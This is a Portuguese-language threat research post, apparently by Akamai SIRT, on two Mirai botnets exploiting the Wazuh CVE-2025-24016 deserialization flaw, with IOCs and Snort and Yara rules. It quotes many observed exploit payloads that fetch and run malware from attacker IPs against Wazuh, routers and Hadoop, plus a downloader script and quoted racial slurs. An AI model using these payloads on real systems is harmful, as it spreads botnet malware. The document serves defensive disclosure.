Duas botnets, uma falha: Mirai se espalha por vulnerabilidade da Wazuh
Todas as descobertas desta pesquisa foram coletadas por meio de honeypots da SIRT e não foram observadas em pontos de extremidade de produção reais da Wazuh que executam o software Wazuh.
AVISO DE CONTEÚDO: Algumas das convenções de nomenclatura usadas pelos invasores mencionados neste artigo incluem insultos raciais e linguagem explícita. Não as ocultamos para fins educacionais e de descoberta. Elas não refletem de forma alguma os valores ou pontos de vista da Akamai.
Sumário executivo
A SIRT (Security Intelligence and Response Team, equipe de inteligência e resposta de segurança) da Akamai identificou a exploração ativa da vulnerabilidade de execução remota de código CVE-2025-24016 nos servidores da Wazuh (CVSS 9.9).
A vulnerabilidade aproveita as solicitações descentralizadas de API (DAPI), permitindo que um invasor execute código remotamente carregando um dicionário não higienizado.
Observamos duas campanhas de variantes do Mirai que exploram essa vulnerabilidade. Uma delas, "Resbot", tem nomenclatura italiana envolvida em seus domínios, possivelmente aludindo à geografia-alvo ou à língua falada pelo proprietário do dispositivo afetado.
A SIRT da Akamai identificou pela primeira vez a atividade em nossa rede global de honeypots em março de 2025. Essa é a primeira exploração ativa relatada desta vulnerabilidade desde a divulgação inicial em fevereiro de 2025.
As botnets que exploram essa vulnerabilidade aproveitaram várias vulnerabilidades conhecidas, incluindo CVE-2023-1389, CVE-2017-17215 e CVE-2017-18368, entre outras.
Incluímos uma lista de indicadores de comprometimento (IOCs) no final desta postagem do blog para ajudar na defesa contra essa ameaça.
Introdução
A SIRT da Akamai observou tentativas de exploração ativa da CVE-2025-24016 no final de março de 2025 em nosso cluster de honeypots expostos à Internet. Identificamos duas botnets diferentes que aproveitam essa exploração para espalhar variantes do malware Mirai para sistemas de destino vulneráveis.
O que é CVE-2025-24016?
Em fevereiro de 2025, a CVE-2025-24016 foi divulgada no pacote do gerenciador da solução de código aberto XDR e SIEM Wazuh. A vulnerabilidade afeta as versões do Wazuh 4.4.0 até 4.9.0, com uma correção lançada na versão 4.9.1. Ela permite que um invasor remoto com acesso à API execute código arbitrário no servidor de destino com um arquivo JSON mal-intencionado.
Na API da Wazuh, os parâmetros da DistributedAPI são serializados como JSON e, em seguida, desserializados usando as_Wazuh_object no arquivo framework/wazuh/core/cluster/common.py. Isso pode ser explorado com a injeção de um dicionário não higienizado em solicitações DAPI, o que pode levar à avaliação de um código Python arbitrário.
No final de fevereiro de 2025, uma prova de conceito (PoC) detalhou como obter RCE com essa vulnerabilidade. A RCE pode ser acionada usando o ponto de extremidade run_as, permitindo que o invasor controle o argumento auth_context. Na PoC, o autor demonstra isso usando uma solicitação do Burp Suite para o URI /security/user/authenticate/run_as (Figura 1).
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Accept: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg== # Base64-
encoded "wazuh-wui:MyS3cr37P450r.*-"
Content-Type: application/json
Content-Length: 83
{
"__unhandled_exc__": {
"__class__": "exit",
"__args__": []
}
}
Fig. 1: solicitação do Burp Suite (fonte: https://github.com/MuhammadWaseem29/CVE-2025-24016)
O cabeçalho da autorização é codificado em Base64 e a carga maliciosa contém a exceção não higienizada __unhandled_exc__, que aciona a execução de um código Python arbitrário, nesse caso, exit.
Exploração ativa
Poucas semanas após a divulgação, no início de março de 2025, a SIRT da Akamai descobriu tentativas de explorar essa vulnerabilidade da Wazuh em nossa rede global de honeypots. Esse é o exemplo mais recente dos tempos cada vez mais curtos para exploração que os operadores de botnets têm adotado para CVEs recém-publicadas.
A autorização de cabeçalho codificada em Base64 é decodificada para wazuh-wui:MyS3cr37P450r.*-, que é idêntica à autorização na exploração da PoC (Figura 2). O ponto de extremidade e a estrutura da solicitação correspondem à exploração da PoC, mas aqui ele é usado para espalhar malware.
/security/user/authenticate/run_as {"__unhandled_exc__":{"__args__":["wget http://176.65.134[.]62/w.sh -O /tmp/temp_script.sh || curl -o /tmp/temp_script.sh http://176.65.134[.]62/w.sh; sh /tmp/temp_script.sh"],"__class__":"os.system"}}
Header Authorization: Basic d2F6dWgtd3VpOk15UzNjcjM3UDQ1MHIuKi0=
Fig. 2: a tentativa de exploração nº 1 é idêntica à PoC
Além disso, detectamos solicitações estruturadas de forma semelhante direcionadas ao ponto de extremidade /Wazuh no início de maio de 2025, o que difere do ponto de extremidade padrão para essa vulnerabilidade (Figura 3). Como as solicitações são quase idênticas às da PoC, além do ponto de extremidade, é provável que a botnet ainda esteja tentando explorar a mesma vulnerabilidade da Wazuh.
/wazuh {"__unhandled_exc__": {"__class__": "os.system", "__args__": ["wget http://104.168.101[.]27/sh -O- | sh"]}}
Header Authorization: Basic d2F6dWgtd3VpOk15UzNjcjM3UDQ1MHIuKi0=
Fig. 3: a tentativa de exploração nº 2 é diferente da PoC
Botnet 1: diversas variantes do Mirai
A exploração ativa desta vulnerabilidade da Wazuh que observamos está conectada a duas botnets separadas. A primeira botnet está conectada às primeiras tentativas no início de março de 2025, nas quais a exploração busca e executa um script de shell mal-intencionado que serve como baixador para a carga principal do malware Mirai (Figura 4). Semelhante aos scripts de shell comuns que vemos com frequência no Mirai, ele oferece suporte a uma variedade de arquiteturas diferentes para atingir principalmente dispositivos da Internet das coisas (IoT).
"busybox wget http://176.65.134[.]62/bins/morte.arm; chmod 777 morte.arm; ./morte.arm morte.arm",
"busybox wget http://176.65.134[.]62/bins/morte.arm5; chmod 777 morte.arm5; ./morte.arm5 morte.arm5",
"busybox wget http://176.65.134[.]62/bins/morte.arm6; chmod 777 morte.arm6; ./morte.arm6 morte.arm6",
"busybox wget http://176.65.134[.]62/bins/morte.arm7; chmod 777 morte.arm7; ./morte.arm7 morte.arm7",
"busybox wget http://176.65.134[.]62/bins/morte.i686; chmod 777 morte.i686; ./morte.i686 morte.i686",
"busybox wget http://176.65.134[.]62/bins/morte.m68k; chmod 777 morte.m68k; ./morte.m68k morte.m68k",
"busybox wget http://176.65.134[.]62/bins/morte.mips; chmod 777 morte.mips; ./morte.mips morte.mips",
"busybox wget http://176.65.134[.]62/bins/morte.mpsl; chmod 777 morte.mpsl; ./morte.mpsl morte.mpsl",
"busybox wget http://176.65.134[.]62/bins/morte.ppc; chmod 777 morte.ppc; ./morte.ppc morte.ppc",
"busybox wget http://176.65.134[.]62/bins/morte.sh4; chmod 777 morte.sh4; ./morte.sh4 morte.sh4",
"busybox wget http://176.65.134[.]62/bins/morte.spc; chmod 777 morte.spc; ./morte.spc morte.spc",
"busybox wget http://176.65.134[.]62/bins/morte.x86; chmod 777 morte.x86; ./morte.x86 morte.x86",
"busybox wget http://176.65.134[.]62/bins/morte.x64; chmod 777 morte.x64; ./morte.x64 morte.x64",
"rm $0"
Fig. 4: conteúdo do script de shell w.sh
Essas amostras do malware Mirai, denominadas "morte", parecem ser variantes LZRD do Mirai, que já existem há algum tempo. Elas podem ser facilmente distinguidas pela sequência exclusiva codificada que imprimem no console de uma máquina de destino após a execução: "lzrd here".
Domínios associados observados
Ao pesquisar o endereço IP 176.65.134[.]62, foi encontrada uma resolução para um domínio de comando e controle (C2) de nuklearcnc.duckdns[.]org. É importante observar que o DNS (Sistema de Nomes de Domínio) Duck é um servidor DNS dinâmico, e apenas esse subdomínio específico é mal-intencionado aqui.
Esse domínio também foi resolvido para 176.65.142.252 em um intervalo de tempo semelhante. Esse IP foi resolvido para outro domínio C2 chamado cbot.galaxias[.]cc. Por meio do VirusTotal, conseguimos encontrar o que parece ser um RAT baseado no Windows, que se disfarça como o processo svchost do Windows e aponta para o subdomínio cbot.galaxias[.]cc para o C2.
Outro subdomínio, neon.galaxias[.]cc, tinha o que parecia ser uma distribuição e comunicação mais padrão da variante do Mirai associada a ele. Um de seus endereços IP de resolução, 209.141.34[.]106, também foi resolvido para dois outros domínios C2: pangacnc[.]com e jimmyudp-raw[.]xyz.
O domínio jimmyudp-raw[.]xyz tinha três amostras de malware Mirai com nomes diferentes no VirusTotal. A primeiro, chamada "neon", é uma variante não identificada do Mirai que se conectava a 65.222.202[.]53 pela porta 80 para comunicação C2 e continha a string de console codificada "fuck u nigga".
A segundo, chamada "k03ldc", parece ser uma versão modificada ou atualizada da variante V3G4 do Mirai. Contendo a string de console codificada "666V3G4-Katana999", ela se conectou a 196.251.86[.]49 pela porta 36063 para comunicação C2.
Por fim, a terceira amostra, chamada "KKveTTgaAAsecNNaaaa", é a variante original do Mirai, V3G4. O malware se conecta ao endereço IP 209.141.34[.]106 pela porta 60195 para comunicação C2, e usa a string codificada "xXxSlicexXxxVEGA" após a infecção. Ele reconhece se uma máquina de destino já está infectada pela variante V3G4 e, se sim, imprime "We got this shit already" em vez da impressão padrão.
O domínio pangacnc[.]com tinha duas amostras diferentes do malware Mirai nomeadas no VirusTotal, uma delas era o malware nomeado "KKveTTgaAAsecNNaaaa", que é idêntico ao mencionado anteriormente. A outra foi denominada "vision" e é uma variante LZRD do Mirai que se conecta a 65.222.202[.]53 pela porta 80, assim como a amostra "neon" do outro domínio C2. Isso alude à possibilidade de que o malware Mirai chamado "neon" seja uma versão modificada da variante LZRD.
Vulnerabilidades adicionais exploradas
Além de visar a RCE da Wazuh, observamos essa botnet tentando explorar uma variedade de outras vulnerabilidades conhecidas. Entre elas, estavam várias vulnerabilidades que observamos serem exploradas (Figura 5, Figura 6 e Figura 7) e documentadas em publicações anteriores do blog.
/ws/v1/cluster/apps {"application-id": "application_1404198295326_0003", "application-name": "get-shell", "am-container-spec": {"commands": {"command": "wget http://176.65.134[.]62/bins/morte.x64; chmod 777 morte.x64; ./morte.x64 morte.x86_64; rm -rf morte.x64; curl -O http://176.65.134[.]62/bins/morte.x64; chmod 777 morte.x64; ./morte.x64 morte.x86_64; rm -rf morte.x64"}}, "application-
Fig. 5: vulnerabilidade do Hadoop YARN
/cgi-bin/luci/;stok=/locale?form=country operation=write&country=$(id>cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://176.65.134[.]62/update.sh; curl -O http://176.65.134[.]62/update.sh; chmod 777 update.sh; sh update.sh; tftp 176.65.134[.]62 -c get tupdate.sh; chmod 777 tupdate.sh; sh tupdate.sh; tftp -r tupdate2.sh -g 176.65.134[.]62; chmod 777 tupdate2.sh; sh tupdate2.sh; ftpget -v -u anonymous -p anonymous -P 21 176.65.134[.]62 update1.sh update1.sh; sh update1.sh; rm -rf update.sh tupdate
Fig. 6: injeção de comando do TP-Link Archer AX21 (consulte https://nvd.nist.gov/vuln/detail/cve-2023-1389)
/manager_dev_ping_t.gch cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.34[.]106/1.sh; curl -O http://209.141.34[.]106/1.sh; chmod 777 1.sh; sh 1.sh; tftp 209.141.34[.]106 -c get 1.sh; chmod 777 1.sh; sh 1.sh; tftp -r 3.sh -g 209.141.34[.]106; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.34[.]106 2.sh 2.sh; sh 2.sh; rm -rf 1.sh 1.sh 3
Fig. 7: Exploração de RCE do roteador ZTE ZXV10 H108L (consulte https://github.com/stasinopoulos/ZTExploit/blob/master/ZTExploit_Source/ztexploit.py)
Botnet 2: botnet Resbot/Resentual
A segunda botnet que identificamos foi a partir das tentativas no ponto de extremidade /Wazuh no início de maio de 2025. Semelhante à primeira exploração, ela também busca e executa um script de shell mal-intencionado para servir como um baixador do Mirai. O malware, chamado "resgod", é identificado por meio de sua string de console codificada "Resentual got you!". Também semelhante à primeira botnet, a carga tem como alvo uma ampla variedade de arquiteturas voltadas para dispositivos de Internet das coisas.
Algo interessante que notamos sobre essa botnet foi o idioma associado. Ela estava usando uma variedade de domínios para espalhar o malware e todos tinham nomenclatura italiana. Domínios como "gestisciweb.com", por exemplo, são traduzidos aproximadamente como "gerenciar a Web".
Eles se assemelham a nomes de domínio mal-intencionados frequentemente usados para ataques de phishing porque parecem muito mais legítimos do que seu C2 "resbot.online" (que é mais claramente um domínio mal-intencionado). As convenções de nomenclatura linguística podem indicar uma campanha direcionada aos dispositivos pertencentes e executados por usuários falantes de italiano em particular.
As cadeias de caracteres na amostra parecem não estar criptografadas e mostram uma variedade de recursos e explorações adicionais de varredura. O endereço IP 104.168.101[.]27 é codificado no malware e usado como servidor C2 na porta TCP 62627 (uma das possíveis portas C2). Além disso, descobrimos que essa botnet está tentando se espalhar via FTP pela porta 21 e realizando varreduras de telnet.
As diferentes explorações codificadas podem ser vistas nas Figuras 8, 9, 10 e 11.
POST /ctrlt/DeviceUpgrade_1 HTT
P/1.1\r\nContent-Length: 440\r\nConnection: keep-alive\r\nAccept: */*\r\nAuthori
zation: Digest username="dslf-config", realm="HuaweiHomeGateway",
nonce="88645ce
fb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1",
response="3612f843a42d
b38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001,
cnonce="248d1a2
560100669"\r\n\r\n<?xml version="1.0" ?><s:Envelope
xmlns:s="http://schemas.xmls
oap.org/soap/envelope/"
s:encodingStyle="http://schemas.xmlsoap.org/soap/encodin
g/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-
org:service:WANPPPConnection:1"
><NewStatusURL>$(/bin/busybox wget -g 104.168.101[.]27 -l /tmp/.kx -r
/resgod.mips
; /bin/busybox chmod +x /tmp/.kx; /tmp/.kx selfrep.huawei)</NewStatusURL>.
<NewDow
nloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade>.
</s:Body></s:Envelope>\r
\n\r\n\r\n
Fig. 8: RCE do roteador Huawei HG532 (consulte https://nvd.nist.gov/vuln/detail/cve-2017-17215)
POST /picsdesc.xml HTTP/1.1\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: /\r\nUser-Agent: Hello-World\r\nConnection: keep-alive\r\n\r\n<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding//%22%3E<s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://104.168.101[.]27/resgod.mips; chmod 777 resgod.mips; ./resgod.mips selfrep.realtek</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n
Fig. 9: RCE no UPnP SOAP do Realtek SDK Miniigd (consulte https://www.google.com/url?q=https://nvd.nist.gov/vuln/detail/cve-2014-8361&sa=D&source=docs&ust=1748461205172738&usg=AOvVaw2FtzN61mQxXkxEWnb9gb05)
POST /cgi-bin/ViewLog.asp HTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 176\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://104.168.101[.]27/resgod.arm7;chmod+777+resgodarm7;./resgodarm7;rm+-rf+resgod.arm7%3b%23&remoteSubmit=Save\r\n\r\n
Fig. 10: injeção de comando no roteador TrueOnline ZyXEL P660HN-T v1 (consulte https://nvd.nist.gov/vuln/detail/cve-2017-18368)
&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=$(echo -e "wget http://104.168.101[.]27/sh" >> /tmp/.res) HTTP/1.0
Fig. 11: espalhamento via FTP
Conclusão
A propagação do Mirai continua relativamente inabalável, pois ainda é bastante simples reaproveitar e reutilizar códigos-fonte antigos para configurar ou criar novas botnets. E os operadores de botnet muitas vezes podem ter sucesso simplesmente aproveitando explorações recém-publicadas.
Embora o programa de CVEs seja, de modo geral, um benefício líquido para o setor, às vezes ele pode ser uma faca de dois gumes, pois revela vulnerabilidades que, de outra forma, poderiam ter sido ignoradas por agentes nefastos.
As tentativas dos pesquisadores de educar as organizações sobre a importância das vulnerabilidades por meio da criação de PoCs continuam a levar a resultados prejudiciais, mostrando como é difícil acompanhar as correções quando elas são lançadas. Os operadores de botnet ficam de olho em algumas dessas divulgações de vulnerabilidades e, especialmente nos casos em que as PoCs são disponibilizadas, eles adaptam rapidamente o código da PoC para proliferar a botnet.
Ao contrário de algumas das outras vulnerabilidades que reportamos recentemente, que geralmente afetam apenas dispositivos descontinuados, a CVE-2025-24016 afeta servidores ativos da Wazuh que executam versões desatualizadas. É altamente recomendável aplicar patches à versão mais recente que contém uma correção, neste caso, a versão 4.9.1 da Wazuh ou posterior. A Wazuh emitiu orientações sobre como proteger adequadamente os sistemas; se essas orientações forem seguidas, essa campanha não deverá representar um problema.
Acompanhe-nos
A SIRT da Akamai continuará monitorando e relatando ameaças como essa para nossos clientes e para a comunidade de segurança em geral. Para acompanhar a SIRT e outras publicações do Akamai Security Intelligence Group, confira nossa página inicial de pesquisa e siga-nos nas redes sociais.
IOCs
Incluímos uma lista de IOCs, bem como regras do Snort e Yara, para ajudar os defensores.
Regras do Snort para IOCs de rede
Regras do Snort para IPs C2 (botnet nº 1)
alert ip any any -> [209.141.34.106, 176.65.142.137, 65.222.202.53, 196.251.86.49, 176.65.134.62] any (
msg:"Possible Botnet C2 Infrastructure Activity - Suspicious IP";
sid:2000001;
rev:1;
threshold:type limit, track by_src, count 1, seconds 600;
classtype:trojan-activity;
metadata:service http, malware;
)
Regras do Snort para detecção de resolução de domínio C2 (botnet nº 1)
alert http any any -> [nuklearcnc.duckdns.org, jimmyudp-raw.xyz, pangacnc.com, neon.galaxias.cc, cbot.galaxias.cc] any (
msg:"Possible Botnet C2 or Malware Distribution - Suspicious Domain";
sid:2000002; rev:1;
classtype:trojan-activity;
metadata:service http, malware;
)
Regras do Snort para IPs C2 (botnet nº 2)
alert ip any any -> [104.168.101.27, 104.168.101.23, 79.124.40.46, 194.195.90.179] any (
msg:"Possible Botnet C2 Infrastructure Activity - Suspicious IP";
sid:2000003;
rev:1;
threshold:type limit, track by_src, count 1, seconds 600;
classtype:trojan-activity;
metadata:service http, malware;
)
Regras do Snort para detecção de resolução de domínio C2 (botnet nº 2)
alert http any any -> [resbot.online, versioneonline.com, web-app-on.com, assicurati-con-linear.online, webdiskwebdisk.webprocediweb.com, continueoraweb.com, ora-0-web.com, adesso-online.com, multi-canale.com, eversioneweb.com, gestisciweb.com] any (
msg:"Possible Botnet C2 or Malware Distribution - Suspicious Domain";
sid:2000004; rev:1;
classtype:trojan-activity;
metadata:service http, malware;
)
Regras da Yara para amostras de malware (botnet nº 1)
rule Mirai_Malware_IOCs_1
{
meta:
description = "Detects files containing IOCs associated with potential Mirai malware"
author = "Akamai SIRT"
date = "2025-05-16"
source = "Akamai SIRT"
malware_family = "Mirai"
version = "1.0"
strings:
$lzrd = "LZRD"
$fucku = "fuck u nigga"
$vega = "xXxSlicexXxxVEGA"
$we_got_this = "We got this shit already"
$katana = "666V3G4-Katana999"
$ip1 = "209.141.34.106"
$ip2 = "176.65.142.137"
$ip3 = "65.222.202.53"
$ip4 = "196.251.86.49"
$ip5 = “176.65.134.62”
$domain1 = "nuklearcnc.duckdns.org"
$domain2 = "jimmyudp-raw.xyz"
$domain3 = "pangacnc.com"
$domain4 = "neon.galaxias.cc"
$domain5 = "cbot.galaxias.cc"
$hash1 = "dece5eaeb26d0ca7cea015448a809ab687e96c6182e56746da9ae4a2b16edaa9"
$hash2 = "7b659210c509058bd5649881f18b21b645acb42f56384cbd6dcb8d16e5aa0549"
$hash3 = "64bd7003f58ac501c7c97f24778a0b8f412481776ab4e6d0e4eb692b08f52b0f"
$hash4 = "4c1e54067911aeb5aa8d1b747f35fdcdfdf4837cad60331e58a7bbb849ca9eed"
$hash5 = "811cd6ebeb9e2b7438ad9d7c382db13c1c04b7d520495261093af51797f5d4cc"
$hash6 = "90df78db1fb5aea6e21c3daca79cc690900ef8a779de61d5b3c0db030f4b4353"
$hash7 = "8a58fa790fc3054c5a13f1e4e1fcb0e1167dbfb5e889b7c543d3cdd9495e9ad6"
$hash8 = "c9df0a2f377ffab37ede8f2b12a776a7ae40fa8a6b4724d5c1898e8e865cfea1"
$hash9 = "6614545eec64c207a6cc981fccae8077eac33a79f286fc9a92582f78e2ae243a"
condition:
(
$lzrd or
$fucku or
$vega or
$we_got_this or
$katana or
$ip1 or
$ip2 or
$ip3 or
$ip4 or
$ip5 or
$domain1 or
$domain2 or
$domain3 or
$domain4 or
$domain5 or
$hash1 or
$hash2 or
$hash3 or
$hash4 or
$hash5 or
$hash6 or
$hash7 or
$hash8 or
$hash9
)
}
Regras da Yara para amostras de malware (botnet nº 2)
rule Mirai_Malware_IOCs_2
{
meta:
description = "Detects files containing IOCs associated with potential Mirai malware."
author = "Akamai SIRT"
date = "2025-05-16"
source = "Akamai SIRT"
malware_family = "Mirai"
version = "1.0"
strings:
$resentual = "Resentual got you"
$ip1 = "104.168.101.27"
$ip2 = "104.168.101.23"
$ip3 = "79.124.40.46"
$ip4 = "194.195.90.179"
$domain1 = "resbot.online"
$domain2 = "versioneonline.com"
$domain3 = "web-app-on.com"
$domain4 = "Assicurati-con-linear.online"
$domain5 = "webdiskwebdisk.webprocediweb.com"
$domain6 = "continueoraweb.com"
$domain7 = "ora-0-web.com"
$domain8 = "adesso-online.com"
$domain9 = "multi-canale.com"
$domain10 = "eversioneweb.com"
$domain11 = "gestisciweb.com"
$hash1 = "9d5c10c7d0d5e2ce8bb7f1d4526439ce59108b2c631dd9e78df4e096e612837b"
$hash2 = "be4070b79a2f956e686469b37a8db1e7e090b9061d3dce73e3733db2dbe004f0"
$hash3 = "e6cf946bd5a17909ae3ed9b1362cfaafa7afe02e74699dcbc3d515a6f964b0b0"
$hash4 = "4d9f632e977b16466b72b6ee90b6de768c720148c1e337709b57ca49c1cdffb6"
$hash5 = "a0b47c781e70877ad4e721ba49f64fc0bc469e38750f070a232d12f03d9990bc"
$hash6 = "941a30698db98f29919cba80e66717c25592697b1447f3e96825730229d97549"
condition:
(
$resentual or
$ip1 or
$ip2 or
$ip3 or
$ip4 or
$domain1 or
$domain2 or
$domain3 or
$domain4 or
$domain5 or
$domain6 or
$domain7 or
$domain8 or
$domain9 or
$domain10 or
$domain11 or
$hash1 or
$hash2 or
$hash3 or
$hash4 or
$hash5 or
$hash6
)
}
Endereços IPv4 maliciosos (botnet nº 1)
209.141.34.106
176.65.142.137
65.222.202.53
196.251.86.49
176.65.134.62
Domínios maliciosos (botnet nº 1)
nuklearcnc.pudns[.]org
jimmyudp-raw[.]xyz
pangacnc[.]com
neon.galaxias[.]cc
cbot.galaxias[.]cc
Endereços IPv4 maliciosos (botnet nº 2)
104.168.101.27
104.168.101.23
79.124.40.46
194.195.90.179
Domínios maliciosos (botnet nº 2)
resbot[.]online
versioneonline[.]com
web-app-on[.]com
Assicurati-con-linear[.]online
webdiskwebdisk.webprocediweb[.]com
continueoraweb[.]com
ora-0-web[.]com
adesso-online[.]com
multi-canale[.]com
eversioneweb[.]com
gestisciweb[.]com
Hashes SHA256 (botnet nº 1)
dece5eaeb26d0ca7cea015448a809ab687e96c6182e56746da9ae4a2b16edaa9
7b659210c509058bd5649881f18b21b645acb42f56384cbd6dcb8d16e5aa0549
64bd7003f58ac501c7c97f24778a0b8f412481776ab4e6d0e4eb692b08f52b0f
4c1e54067911aeb5aa8d1b747f35fdcdfdf4837cad60331e58a7bbb849ca9eed
811cd6ebeb9e2b7438ad9d7c382db13c1c04b7d520495261093af51797f5d4cc
90df78db1fb5aea6e21c3daca79cc690900ef8a779de61d5b3c0db030f4b4353
8a58fa790fc3054c5a13f1e4e1fcb0e1167dbfb5e889b7c543d3cdd9495e9ad6
c9df0a2f377ffab37ede8f2b12a776a7ae40fa8a6b4724d5c1898e8e865cfea1
6614545eec64c207a6cc981fccae8077eac33a79f286fc9a92582f78e2ae243a
Hashes SHA256 (botnet nº 2)
9d5c10c7d0d5e2ce8bb7f1d4526439ce59108b2c631dd9e78df4e096e612837b
be4070b79a2f956e686469b37a8db1e7e090b9061d3dce73e3733db2dbe004f0
e6cf946bd5a17909ae3ed9b1362cfaafa7afe02e74699dcbc3d515a6f964b0b0
4d9f632e977b16466b72b6ee90b6de768c720148c1e337709b57ca49c1cdffb6
a0b47c781e70877ad4e721ba49f64fc0bc469e38750f070a232d12f03d9990bc
941a30698db98f29919cba80e66717c25592697b1447f3e96825730229d97549
